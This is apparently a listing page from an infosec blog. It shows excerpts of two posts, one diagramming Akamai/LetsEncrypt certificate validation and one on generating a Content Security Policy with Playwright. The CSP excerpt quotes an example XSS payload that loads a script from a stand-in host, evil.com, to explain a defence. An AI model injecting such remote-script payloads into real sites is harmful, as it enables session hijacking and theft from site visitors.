a technical infosec blog


Automating Akamai / LetsEncrypt Cert Validation

CPS workflow (Mermaid diagram source, as rendered on the post):

graph TD;
  start[START] --> A
  subgraph Updates To Certs Initiated
    A[Create certificate with all subdomains in Akamai CPS GUI] -->
    B[Create Certificate Signing Request - CSR] -->
    C[Submit CSR to LetsEncrypt]
  end

  subgraph Manual Validation -- very time consuming!
    C -->
    D[List of DNS ACME Validation records returned] -->
    E[Add each record by hand in the Akamai DNS GUI] -->
    F[Wait an hour until LetsEncrypt validates ownership of domains]
  end

  subgraph Akamai Cert Provisioning System
    F -->
    G[Retrieve certificates] -->
    H[Push to Akamai staging] -->
    I{Is always test<br>on staging on?...

// Kevin Pham · May 5, 2021
Generating a CSP using a playwright script

Implementing Content Security Policies, The Easy Way.

What’s a CSP? One of the mitigating defenses against XSS and Clickjacking attacks is a good Content Security Policy (CSP). While not a panacea, it can effectively limit the severity of any exploit by constraining the XSS payload to the size of the injection window, which is typically only a few characters. Instead of externally loading a payload like <script src="https://evil.com/payload.js"/>, the entire payload must be encoded within the script evaluation window, effectively preventing nasty frameworks like BeEF from being loaded....

// Kevin Pham · May 4, 2021